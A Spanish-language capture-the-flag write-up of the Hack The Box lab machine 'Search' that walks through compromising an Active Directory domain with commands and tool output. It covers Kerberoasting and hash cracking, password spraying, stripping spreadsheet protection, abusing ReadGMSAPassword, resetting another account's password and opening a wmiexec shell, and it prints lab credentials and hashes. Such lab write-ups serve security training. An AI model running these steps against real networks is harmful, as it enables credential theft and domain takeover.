Maquina Retirada Search de Hack The Box (Necesario VIP)
Published on 05 Jun 2022
Querier ~ Hack The Box
Realizamos el Primer escaneo con Nmap
$" nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn -oG allports 10.10.11.129 "
Procedemos con el siguiente escaneo de Nmap
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNSPlus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search — Just Testing IIS
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-12-24 18:38:51Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2021-12-24T18:40:22+00:00; +1s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search — Just Testing IIS
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2021-12-24T18:40:22+00:00; +1s from scanner time.
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2021-12-24T18:40:22+00:00; +1s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2021-12-24T18:40:22+00:00; +1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2021-12-24T18:40:22+00:00; +1s from scanner time.
8172/tcp open ssl/http Microsoft IIS httpd 10.
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after: 2030-04-05T09:05:25
|_ssl-date: 2021-12-24T18:40:22+00:00; +1s from scanner time.
| tls-alpn:
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49691/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
49725/tcp open msrpc Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-12-24T18:39:43
|_ start_date: N/A
Como vemos procedemos a añadir el commonName de la maquina al /etc/hosts/ –> search.htb research.htb
Seguimos enumerando informcion, empezando por la pagina WEB
http://10.10.11.129 [200 OK] Bootstrap, Country[RESERVED][ZZ], Email[youremail@search.htb], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[10.10.11.129], JQuery[3.3.1], Microsoft-IIS[10.0], Script, Title[Search — Just Testing IIS], X-Powered-By[ASP.NET]
Procedemos a enumerar la pagina web visualmente.
Encontramos la siguiente credencial y user --> "http://10.10.11.129/images/slide_2.jpg"
User: "Hope Sharp" --> Pass: "IsolationIsKey?"
Verificamos con Crackmapexec la credencial obtenida para el usuario hope.sharp
# crackmapexec smb 10.10.11.129 -u hope.sharp -p 'IsolationIsKey?'
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [+] search.htb\hope.sharp:IsolationIsKey?
Procedemos a intentar conectarnos a los recursos de SMB
# smbmap -u '' -H 10.10.11.129
[+] IP: 10.10.11.129:445 Name: search.htb
# smbmap -u 'hope.sharp' -p 'IsolationIsKey?' -H 10.10.11.129
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
helpdesk NO ACCESS
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
RedirectedFolders$ READ, WRITE
SYSVOL READ ONLY Logon server share
Enumeramos Usuarios del Sistema por SMB
# smbmap -u 'hope.sharp' -p 'IsolationIsKey?' -H 10.10.11.129 -r 'RedirectedFolders$'
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
RedirectedFolders$ READ, WRITE
.\RedirectedFolders$\*
dr--r--r-- 0 Mon Jun 6 11:47:52 2022 .
dr--r--r-- 0 Mon Jun 6 11:47:52 2022 ..
dr--r--r-- 0 Tue Apr 7 20:12:58 2020 abril.suarez
dr--r--r-- 0 Fri Jul 31 15:11:32 2020 Angie.Duffy
dr--r--r-- 0 Fri Jul 31 14:35:32 2020 Antony.Russo
dr--r--r-- 0 Tue Apr 7 20:32:31 2020 belen.compton
dr--r--r-- 0 Fri Jul 31 14:37:36 2020 Cameron.Melendez
dr--r--r-- 0 Tue Apr 7 20:15:09 2020 chanel.bell
dr--r--r-- 0 Fri Jul 31 15:09:07 2020 Claudia.Pugh
dr--r--r-- 0 Fri Jul 31 14:02:04 2020 Cortez.Hickman
dr--r--r-- 0 Tue Apr 7 20:20:08 2020 dax.santiago
dr--r--r-- 0 Fri Jul 31 13:55:34 2020 Eddie.Stevens
dr--r--r-- 0 Thu Apr 9 22:04:11 2020 edgar.jacobs
dr--r--r-- 0 Fri Jul 31 14:39:50 2020 Edith.Walls
dr--r--r-- 0 Tue Apr 7 20:23:13 2020 eve.galvan
dr--r--r-- 0 Tue Apr 7 20:29:22 2020 frederick.cuevas
dr--r--r-- 0 Thu Apr 9 16:34:41 2020 hope.sharp
dr--r--r-- 0 Tue Apr 7 20:07:00 2020 jayla.roberts
dr--r--r-- 0 Fri Jul 31 15:01:06 2020 Jordan.Gregory
dr--r--r-- 0 Thu Apr 9 22:11:39 2020 payton.harmon
dr--r--r-- 0 Fri Jul 31 13:44:32 2020 Reginald.Morton
dr--r--r-- 0 Tue Apr 7 20:10:25 2020 santino.benjamin
dr--r--r-- 0 Fri Jul 31 14:21:42 2020 Savanah.Velazquez
dr--r--r-- 0 Thu Nov 18 02:01:45 2021 sierra.frye
dr--r--r-- 0 Thu Apr 9 22:14:26 2020 trace.ryan
Procedemos a crearnos un listado de Usuarios Potenciales.
# smbmap -u 'hope.sharp' -p 'IsolationIsKey?' -H 10.10.11.129 -r 'RedirectedFolders$' | awk 'NF{print $NF}' | tail -n 23 > "users.txt"
abril.suarez
Angie.Duffy
Antony.Russo
belen.compton
Cameron.Melendez
chanel.bell
Claudia.Pugh
Cortez.Hickman
dax.santiago
Eddie.Stevens
edgar.jacobs
Edith.Walls
eve.galvan
frederick.cuevas
hope.sharp
jayla.roberts
Jordan.Gregory
payton.harmon
Reginald.Morton
santino.benjamin
Savanah.Velazquez
sierra.frye
trace.ryan
Procedo a realizar un ASPRepRoast Attack con el listado de usuarios encontrado:
No encontramos ningun usuario ASPRepRoasteable
Procedemos a realizar un Kerberoasting Attack ya que tenemos las credenciales para el usuario Hope.Sharp
# GetUserSPNs.py search.htb/hope.sharp:'IsolationIsKey?'
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- ------- -------- -------------------------- --------- ----------
RESEARCH/web_svc.search.htb:60001 web_svc 2020-04-09 14:59:11.329031 <never>
# GetUserSPNs.py search.htb/hope.sharp:'IsolationIsKey?' -request
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- ------- -------- -------------------------- --------- ----------
RESEARCH/web_svc.search.htb:60001 web_svc 2020-04-09 14:59:11.329031 <never>
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$cbf7ed318a7ad8cef8eb9e0e46d358f2$bf63b6d423102abf531eb367994089d64a58d07aa240148ae60a26dd7e4c556b5a5916833b383160108453c1c1ee2cce944fa0a37024e5843d01c522a7a3169d622839224ae5132b1a83b77d2c6d0157fd046088594e020325b94c4adc9bfb3cec364a71962220599f0fede8af038bbc894748faade1ac12305969d26705a97902f3e8ea4ed9073a03c21ff05681f6da028330c3a399a006111936fdccf0fa74f8f97e4c9f8ab1fa410d9a1814ab455d9c4402a54a0ec8011b62d076858471b66413743908639c886cf4f6735605c44fc82794d87231cfab376d6aba77654634c293afa887fde00e430a2be1c381608a0d49ec454d7017f137c1308347702aa0e34f144ac7d917984e5d46dc64d06212bc292bb5e3a9f47b3bb2eed119ca8477250f70246882243dde35cbee1d206ffb0f01362aceb7dd6a96c12ebb40cd94e4d7301123556c1506218961effc6d5bd3be6cae7d312a9f9e2a702132c385cf8cb7b790a3b6d1aa81fc9cb424805dbac398d35f2ffd3dd41e1a3014bbc41933b298c18796890c164ac99ff19581a67be244242e033ee6541596c57055a84c47e05be885cca5ed5f6db6e99036a2ab307c1b07bb96f0618267831f7fe203d16766318c109893b7b516bdda7eb07c2810c7dd6ac21cd0f3e738c82a0de6244d2cc83fc69edd068fe5912cfedb7933aa64fd5b020a575dc297f5a4ca4b38d0287cd8393219ad552f0bdfc0a487a44100fa0732d5477f2e7571d965e1d2e4ecdff110a28b35b4c53010d7d737c4a11614f679f86dd06b9e161825bcdc400c146a0cf2b43816bb4fcc22f86ca98c90f13d7f807f221d5c5b7f9cc136249432ddcb50be81d2bfc7d62a085ee7cbc2ded6a2b655abf119bb1d1a16116354b4f83e35ab2842f77a44f1156749b2c96ab21b25bd6b971260350ef6446f0674ecf409bc4b0b5d9f5adc4fdc729177e9a7c5fad3ac215ffca8e32e2f6a944efd3f0c630c74f17529631599eb24e1363056f3f544b6951a8b0749065c90f60b4bcf2c431f3c0827fc7135a4c22fdc3189a56bf03851ba0c97bfa5379e18912c0bba137b360ab1b9e44a921176e3d0f2f961bb4fd1ff3bcbb0d7b4b5e82a95ea6d4bbb1896cd36f665b05a8e63c3e9b7885e11b9b2a0c84b946ad34985f4215db8c075127149baae3a4e967e7754790c701f8fabb802ae25d605446581ad6e84bb30445fb49c87ebdb392678a78dccfe9c77a0cd724d143dd2051a7f4dc21ccd1d83ce673354fc4ef171dff5f9bc8bfe4cc72c4f4ed3c538f01129b46ea227c0b378555c807fee342a2fde76aebcb8dec3535d9ae58e22310a4b7483c023047e10c46efbef021ed13c5a7034213aa2b7671569fdfaeb9632c2e8827e7f3f660d68837ed0fb069ad62575c649dd894d47e5f624d1fbd53a9653b0fed574873757319e4439f98ffb966844bc39b7a65915d18efdca4687893994680aa4
Procedemos a a intentar Crackear el TGS para sacar la password en texto claro
# john --wordlist=/usr/share/wordlists/rockyou.txt hash_web_svc
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
" @3ONEmillionbaby (web_svc) "
1g 0:00:00:03 DONE (2022-06-06 12:03) 0.3012g/s 3461Kp/s 3461Kc/s 3461KC/s @4208891ncv..?!*Dopey*?!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Procedo a hacer un password Spray con el listado de usuarios y la nueva contraseña conseguida
# crackmapexec smb 10.10.11.129 -u users -p '@3ONEmillionbaby' --continue-on-success
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [+] search.htb\web_svc:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [+] search.htb\edgar.jacobs:@3ONEmillionbaby
Procedo a seguir ojeando los recursos de SMB para el nuevo usuario edgar.jacobs
# smbmap -u 'edgar.jacobs' -p '@3ONEmillionbaby' -H 10.10.11.129 -r 'RedirectedFolders$/edgar.jacobs/Desktop'
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
RedirectedFolders$ READ, WRITE
.\RedirectedFolders$edgar.jacobs\Desktop\*
dw--w--w-- 0 Mon Aug 10 12:02:16 2020 .
dw--w--w-- 0 Mon Aug 10 12:02:16 2020 ..
dr--r--r-- 0 Thu Apr 9 22:05:29 2020 $RECYCLE.BIN
fr--r--r-- 282 Mon Aug 10 12:02:16 2020 desktop.ini
fr--r--r-- 1450 Thu Apr 9 22:05:03 2020 Microsoft Edge.lnk
fr--r--r-- 23130 Mon Aug 10 12:30:05 2020 " Phishing_Attempt.xlsx"
Encontramos un recurso nuevo que nos traemos a nuestra maquina atacante
# smbmap -u 'edgar.jacobs' -p '@3ONEmillionbaby' -H 10.10.11.129 --download 'RedirectedFolders$/edgar.jacobs/Desktop/Phishing_Attempt.xlsx'
[+] Starting download: RedirectedFolders$\edgar.jacobs\Desktop\Phishing_Attempt.xlsx (23130 bytes)
[+] File output to: /home/pro/Escritorio/HTB/Search/content/10.10.11.129-RedirectedFolders_edgar.jacobs_Desktop_Phishing_Attempt.xlsx
Procedemos a movernos el archivo a una carpeta vacia y abrirlo, al abrirlo vemos que falta una Columna ‘C’ y procedemos a realizar un ‘unzip’ para Bypassear las Restricciones del Excell
Procedimiento a Seguir :
unzip Phishing_Attempt.xlsx
sed-i's/<sheetProtection[^>]*>//' xl/worksheets/sheet2.xml
zip -fr Phishing_Attempt.xlsx *
# ls
'[Content_Types].xml' docProps Phishing_Attempt.xlsx _rels xl
# Procedemos a modificar el archivo sheet2.xml para quitar la <sheetProtection> y volver a zipear el archivo quitando la proteccion
# zip -fr Phishing_Attempt.xlsx *
freshening: xl/worksheets/sheet2.xml (deflated 73%)
# ls
'[Content_Types].xml' docProps Phishing_Attempt.xlsx _rels xl
# wps Phishing_Attempt.xlsx
Firstname lastname password Username
Payton Harmon ;;36!cried!INDIA!year!50;; Payton.Harmon
Cortez Hickman ..10-time-TALK-proud-66.. Cortez.Hickman
Bobby Wolf ??47^before^WORLD^surprise^91?? Bobby.Wolf
Margaret Robinson //51+mountain+DEAR+noise+83// Margaret.Robinson
Scarlett Parks ++47|building|WARSAW|gave|60++ Scarlett.Parks
Eliezer Jordan !!05_goes_SEVEN_offer_83!! Eliezer.Jordan
Hunter Kirby ~~27%when%VILLAGE%full%00~~ Hunter.Kirby
Sierra Frye $$49=wide=STRAIGHT=jordan=28$$18 Sierra.Frye
Annabelle Wells ==95~pass~QUIET~austria~77== Annabelle.Wells
Eve Galvan //61!banker!FANCY!measure!25// Eve.Galvan
Jeramiah Fritz ??40:student:MAYOR:been:66?? Jeramiah.Fritz
Abby Gonzalez &&75:major:RADIO:state:93&& Abby.Gonzalez
Joy Costa **30*venus*BALL*office*42** Joy.Costa
Vincent Sutton **24&moment&BRAZIL&members&66** Vincent.Sutton
Procedemos a probar las contraseñas encontradas para los usuarios encontrados
# crackmapexec smb 10.10.11.129 -u sierra.frye -p '$$49=wide=STRAIGHT=jordan=28$$18'
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [+] search.htb\sierra.frye:$$49=wide=STRAIGHT=jordan=28$$18
Procedemos a comprobar los Recursos de SMB para este usuario.
# smbmap -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -H 10.10.11.129 -r 'RedirectedFolders$/sierra.frye'
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
RedirectedFolders$ READ, WRITE
.\RedirectedFolders$sierra.frye\*
dr--r--r-- 0 Thu Nov 18 02:01:45 2021 .
dr--r--r-- 0 Thu Nov 18 02:01:45 2021 ..
dw--w--w-- 0 Thu Nov 18 02:08:17 2021 Desktop
dw--w--w-- 0 Fri Jul 31 16:42:19 2020 Documents
dw--w--w-- 0 Fri Jul 31 16:45:36 2020 Downloads
fr--r--r-- 33 Thu Nov 18 02:01:45 2021 "user.txt"
# smbmap -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -H 10.10.11.129 --download 'RedirectedFolders$/sierra.frye/user.txt'
[+] Starting download: RedirectedFolders$\sierra.frye\user.txt (33 bytes)
[+] File output to: /home/pro/Escritorio/HTB/Search/content/10.10.11.129-RedirectedFolders_sierra.frye_user.txt
# cat user.txt
39d6dde72c8e6b2a0d4exxxxxxxxxxxxxxxxx
Enumeramos un poco mas ..
# smbmap -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -H 10.10.11.129 -r 'RedirectedFolders$/sierra.frye/Downloads'
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
RedirectedFolders$ READ, WRITE
.\RedirectedFolders$sierra.frye\Downloads\*
dw--w--w-- 0 Fri Jul 31 16:45:36 2020 .
dw--w--w-- 0 Fri Jul 31 16:45:36 2020 ..
dr--r--r-- 0 Thu Jul 30 19:25:57 2020 $RECYCLE.BIN
dr--r--r-- 0 Mon Aug 10 22:39:17 2020 Backups
fr--r--r-- 282 Fri Jul 31 16:42:18 2020 desktop.ini
# smbmap -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -H 10.10.11.129 -r 'RedirectedFolders$/sierra.frye/Downloads/Backups'
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
RedirectedFolders$ READ, WRITE
.\RedirectedFolders$sierra.frye\Downloads\Backups\*
dr--r--r-- 0 Mon Aug 10 22:39:17 2020 .
dr--r--r-- 0 Mon Aug 10 22:39:17 2020 ..
fr--r--r-- 2643 Fri Jul 31 17:04:11 2020 search-RESEARCH-CA.p12
fr--r--r-- 4326 Mon Aug 10 22:39:17 2020 staff.pfx
# smbmap -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -H 10.10.11.129 --download 'RedirectedFolders$/sierra.frye/Downloads/Backups/staff.pfx'
[+] Starting download: RedirectedFolders$\sierra.frye\Downloads\Backups\staff.pfx (4326 bytes)
[+] File output to: /home/pro/Escritorio/HTB/Search/content/10.10.11.129-RedirectedFolders_sierra.frye_Downloads_Backups_staff.pfx
# smbmap -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -H 10.10.11.129 --download 'RedirectedFolders$/sierra.frye/Downloads/Backups/search-RESEARCH-CA.p12'
[+] Starting download: RedirectedFolders$\sierra.frye\Downloads\Backups\search-RESEARCH-CA.p12 (2643 bytes)
[+] File output to: /home/pro/Escritorio/HTB/Search/content/10.10.11.129-RedirectedFolders_sierra.frye_Downloads_Backups_search-RESEARCH-CA.p12
Una vez descargados los dos archivos vemos que estamos ante un archivo .pfx (el cual podemos crackear) y un certificado que podemos importar en Firefox para acceder a algun recurso..
# pfx2john staff.pfx > hash_pfx
# # john hash_pfx --show
staff.pfx:misspissy:::::staff.pfx
1 password hash cracked, 0 left
Procedemos a hacer fuzzing en la pagina web
# wfuzz -c --hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.11.129/FUZZ
Target: http://10.10.11.129/FUZZ
Total requests: 220548
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000232: 403 29 L 92 W 1233 Ch "staff"
000000003: 301 1 L 10 W 150 Ch "images"
000000190: 301 1 L 10 W 150 Ch "Images"
000000537: 301 1 L 10 W 147 Ch "css"
000000940: 301 1 L 10 W 146 Ch "js"
000002601: 403 29 L 92 W 1233 Ch "Staff"
000002758: 301 1 L 10 W 149 Ch "fonts"
Probando la ruta "staff" vemos que se nos pide un certificado, procedemos a subir el CA.p12 que nos hemos descargado y nos pide una contraseña introducimos misspissy la passwd obtenida para el archivo .pfx
Accedemos a un panel --> "https://10.10.11.129/staff/en-US/logon.aspx?ReturnUrl=%2fstaff%2f"
Nos Logueamos con el user sierra.frye y su pass, machine name –> Research
Obtenemos una consola interactiva --> "https://10.10.11.129/staff/en-US/console.aspx"
Obtenida la Flag de user.txt procedemos inicializar Neo4j y a enumerar con BloodHound, para ver como podriamos llegar a ser administradores del Dominio.
Como ya poseemos credenciales validas podemos usar BloodHound.py para recolectar informacion del sistema.
# python3 /opt/BloodHound.py/bloodhound.py -u hope.sharp -p "IsolationIsKey?" -d search.htb -ns 10.10.11.129 --zip
20220606130949_bloodhound.zip
Cargamos el .zip en BloodHound –> y marcamos los usuarios que ya tenemos como Owned o Pwned Procedemos a irnos a Shortest Paths y desde el usuario Sierra Frye pinchamos en Shortest Parth from Owned Principals
Sierra.Frye Pertenece a ---> Group: Birmingham-itsec@search.htb --> Group: ITSECT@search.htb --> "ReadGMSAPassword" --> user: BIR-ADFS-GMSA@SEARCH.HTB
Abusando de ReadGMSAPassword :
AD --> ReadGMSAPassword Powershell
Procedemos de la siguiente forma:
Get-ADServiceAccount
PS C:\Users\Sierra.Frye\Documents>
Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties msds-ManagedPassword
DistinguishedName : CN=BIR-ADFS-GMSA,CN=Managed Service Accounts,DC=search,DC=htb
Enabled : True
msds-ManagedPassword : {1, 0, 0, 0...}
Name : BIR-ADFS-GMSA
ObjectClass : msDS-GroupManagedServiceAccount
ObjectGUID : 48cd6c5b-56cb-407e-ac2b-7294b5a44857
SamAccountName : BIR-ADFS-GMSA$
SID : S-1-5-21-271492789-1610487937-1871574529-1299
UserPrincipalName :
– Sacando la Credencial en formato NT Hash–
PS C:\Users\Sierra.Frye\Documents>
$pwd = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties msds-ManagedPassword
PS C:\Users\Sierra.Frye\Documents>
$pw = ConvertFrom-ADManagedPasswordBlob $pwd.’msds-managedpassword’
PS C:\Users\Sierra.Frye\Documents>
ConvertTo-NTHash $pw.securecurrentpassword
e1e9fd9e46d0d747e1595167eedcec0f
– Sacando la Credencial –
PS C:\Users\Sierra.Frye\Documents>
$gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties msDS-ManagedPassword
PS C:\Users\Sierra.Frye\Documents>
$mp = $gmsa.'msDS-ManagedPassword'
PS C:\Users\Sierra.Frye\Documents>
ConvertFrom-ADManagedPasswordBlob $mp
Version : 1
CurrentPassword : ꪌ絸禔හॐ뒟娯㔃ᴨ蝓㣹瑹䢓疒웠ᇷꀠ믱츎孻勒壉馮ၸ뛋귊餮꤯ꏗ춰䃳ꘑ畓릝樗껇쁵藫䲈酜⏬궩Œ痧蘸朘嶑侪糼亵韬⓼ↂᡳ춲⼦싸ᖥ裹沑扚羺歖㗻෪ꂓ㚬⮗㞗ꆱ긿쾏㢿쭗캵십ㇾ롤
ᒛ�䬁ማ譿녓鏶骲雰騆惿閴滭䶙竜迉竾ﵸ䲗蔍瞬䦕垞뉧⩱茾蒚⟒澽座걍盡篇
SecureCurrentPassword : System.Security.SecureString
PreviousPassword :
SecurePreviousPassword :
QueryPasswordInterval : 2862.13:38:54.3458092
UnchangedPasswordInterval : 2862.13:33:54.3458092
– Uso de ScriptBlock para ejecutar Comando como el usuario BIR-ADFS-GMSA –
PS C:\Users\Sierra.Frye\Documents>
$pass = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
PS C:\Users\Sierra.Frye\Documents>
$cred = New-Object System.Management.Automation.PSCredential 'BIR-ADFS-GMSA' , $pass
PS C:\Users\Sierra.Frye\Documents>
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock { whoami }
search\bir-adfs-gmsa$
—– Cambiando la Password al usuario Tristan Davies ——–
PS C:\Users\Sierra.Frye\Documents>
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock { net user tristan.davies Password123$ }
The command completed successfully.
– Conexion una vez cambiada la password –
wmiexec.py search.htb/tristan.davies:'Password123$'@10.10.11.129 -shell-type cmd -dc-ip 10.10.11.129
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
search\tristan.davies
C:\Users\Administrator\Desktop>type root.txt
4e22ea74086xxxxxxxxxxxxxxxxxxxxxxxxxx
Machine Rooteada =), que tiemble el examen del OSCP